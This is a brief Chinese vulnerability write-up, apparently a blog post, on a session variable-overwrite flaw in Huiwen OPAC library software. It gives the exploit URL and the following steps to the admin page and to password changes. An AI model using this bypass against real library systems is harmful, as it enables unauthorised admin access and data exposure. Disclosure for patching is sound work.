这是汇文OPAC很早就存在的一个严重漏洞
补充漏洞信息参考来源https://www.seebug.org/vuldb/ssvid-90722
1. 利用存在该漏洞参数的链接,访问存在漏洞文件,并覆盖 session 值
http://*******/opac/openlink_ebk.php?_SESSION[ADMIN_USER]=opac_admin
2.直接访问后台地址
http://********/admin/cfg_basic.php
3.后台可直接修改密码
数据库信息
4.总结
系统不更新的危害太大了,变量覆盖在此处的危害及其严重。